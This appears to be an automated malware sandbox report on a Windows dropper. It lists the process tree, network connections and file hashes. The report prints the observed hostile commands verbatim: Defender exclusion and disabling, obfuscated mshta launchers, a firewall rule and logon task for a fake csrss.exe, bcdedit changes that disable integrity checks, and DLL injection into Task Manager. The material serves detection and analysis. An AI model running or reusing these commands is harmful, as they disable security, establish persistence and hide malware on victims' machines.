C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe
Tue127d1be88dd70f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
Tue121e696b2d94fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
Tue1239d4b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe
Tue127ff3b5477.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
Tue129ba086d712.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe
Tue12b505de68357.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe
Tue12b645e6648.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
Tue12f72da5484b.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe
Tue1264f7b252.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe
Tue120ba2d3df.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe
Tue125fd9410f80dd6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe" -u
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe
Tue12536443c2c8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe
Tue122eaa5d903b51f3.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe
Tue123e8bf9beda40e5.exe
C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp" /SL5="$70192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ("WSCrIPT.sheLL" ). RUn( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If """" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" ) do taskkill /F -Im ""%~Nxh"" ", 0, trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp" /SL5="$6015E,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe"
C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp" /SL5="$70160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "" == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" ) do taskkill /F -Im "%~Nxh"
C:\Users\Admin\AppData\Local\Temp\YFBh.exE
YFBH.EXe -pM6ql1llc4LCunhpM
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Tue120ba2d3df.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ("WSCrIPT.sheLL" ). RUn( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If ""-pM6ql1llc4LCunhpM "" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" ) do taskkill /F -Im ""%~Nxh"" ", 0, trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "-pM6ql1llc4LCunhpM " == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" ) do taskkill /F -Im "%~Nxh"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241109212805.log C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCrIpT:clOSe( CreATEObjeCt( "WsCriPT.sheLL" ). ruN ( "Cmd.exe /q /c Echo | SeT /P = ""MZ"" > ylDS9MD.oZ & CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2 ", 0 , trUe ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Echo | SeT /P = "MZ" > ylDS9MD.oZ& CoPy /B /Y YlDS9MD.OZ+7YBr4YIV.4 + L8jNB.A+ Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ylDS9MD.oZ"
C:\Windows\SysWOW64\control.exe
control .\NKGTN.2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NKGTN.2
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files (x86)\Gparted\Build.sfx.exe
"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
C:\Program Files (x86)\Gparted\Build.exe
"C:\Program Files (x86)\Gparted\Build.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\Program Files (x86)\Gparted\gimagex.exe
"C:\Program Files (x86)\Gparted\gimagex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "93478235813389613141469676073-1481490987-849097770-411083071-256084815-1993590202"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-130913910907659240-117405465-1152408639-1249432833413201776-3437839801289592925"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3089677442696828811337722847-2117008512-245034745-14781113735556310801475178297"
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NKGTN.2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NKGTN.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 1668
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| FR | 212.193.30.45:80 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | 56.jpgamehome.com | udp |
| US | 8.8.8.8:53 | tweakballs.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | webdatingcompany.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | buy-fantasy-gxmes.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| NL | 185.154.15.4:21735 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| FR | 212.193.30.29:80 | | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | www.yahoo.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| DE | 212.192.241.62:80 | | tcp |
| NL | 185.154.15.4:21735 | | tcp |
| US | 8.8.8.8:53 | trumops.com | udp |
| US | 8.8.8.8:53 | www.yahoo.com | udp |
| US | 8.8.8.8:53 | retoti.com | udp |
| US | 8.8.8.8:53 | logs.trumops.com | udp |
| US | 8.8.8.8:53 | logs.retoti.com | udp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | bfdeedc9-3ac6-448e-a6f3-60a0bcb893c2.uuid.trumops.com | udp |
| US | 8.8.8.8:53 | server10.trumops.com | udp |
| US | 44.221.84.105:443 | server10.trumops.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| NL | 185.154.15.4:21735 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| NL | 185.154.15.4:21735 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| NL | 185.154.15.4:21735 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| US | 8.8.8.8:53 | dumancue.com | udp |
| FR | 91.121.67.60:51630 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
| DE | 49.12.219.50:4846 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
| MD5 | 653f5bbaac95d546bb4c5c7557b25c22 |
| SHA1 | 346e064735ca5abe0963288dd342d7ea058bb61a |
| SHA256 | d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12 |
| SHA512 | 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2692-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2692-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2692-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2692-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2692-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-75-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2692-74-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2692-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2692-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2692-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe
| MD5 | 4f11e641d16d9590ac1c9f70d215050a |
| SHA1 | 75688f56c970cd55876f445c8319d7b91ce556fb |
| SHA256 | efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0 |
| SHA512 | b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
| MD5 | 7b253e0725b69672ef3d44d524de2c4c |
| SHA1 | f3c0d9f5f984ee5d7578eeabded495094cec1031 |
| SHA256 | 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c |
| SHA512 | 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
| MD5 | 7d7f14a1b3b8ee4e148e82b9c2f28aed |
| SHA1 | 649a29887915908dfba6bbcdaed2108511776b5a |
| SHA256 | 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb |
| SHA512 | 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3 |
memory/2692-104-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2692-103-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe
| MD5 | cd6d011a663a12f81ba8e4e5407e3a6f |
| SHA1 | 53c81876f0ff422d41f19c6d2ea0d30548e4e071 |
| SHA256 | c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1 |
| SHA512 | 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
| MD5 | c7cd0def6982f7b281c6a61d29eec4be |
| SHA1 | f9f600d70d60cf79563e84cec0b883fa3f541690 |
| SHA256 | b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9 |
| SHA512 | 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe
| MD5 | 8268aa1cba3763a79c3dd333ab42c093 |
| SHA1 | e7d034e6f55bc07b38ad50f5bb2e83f098c60c97 |
| SHA256 | 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f |
| SHA512 | 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
| MD5 | 314e3dc1f42fb9d858d3db84deac9343 |
| SHA1 | dec9f05c3bcc759b76f4109eb369db9c9666834b |
| SHA256 | 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08 |
| SHA512 | 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2 |
memory/1440-137-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2692-105-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe
| MD5 | b33a3fb6b491b328dacaf18c302b20de |
| SHA1 | 41281e81ec9ba49af4af18f3c61038e62818d3c6 |
| SHA256 | 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72 |
| SHA512 | a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe
| MD5 | b84f79adfccd86a27b99918413bb54ba |
| SHA1 | 06a61ab105da65f78aacdd996801c92d5340b6ca |
| SHA256 | 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49 |
| SHA512 | 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
| MD5 | 343befc915e3428791029f5f314393b9 |
| SHA1 | 47701bb5f2f8b6c5135abccec790378c3986f555 |
| SHA256 | 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da |
| SHA512 | 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe
| MD5 | 3476b903e6e6ff5f246460e8749fd232 |
| SHA1 | 3639e6c1f104ad7aa24ab7f72aca5dad686361cf |
| SHA256 | 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002 |
| SHA512 | ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe
| MD5 | f4a5ef05e9978b2215c756154f9a3fdb |
| SHA1 | c933a1debeea407d608464b33588b19c299295c6 |
| SHA256 | d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69 |
| SHA512 | f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77 |
memory/2136-141-0x0000000001200000-0x0000000001226000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G7PIUG5SR263X945YGX.temp
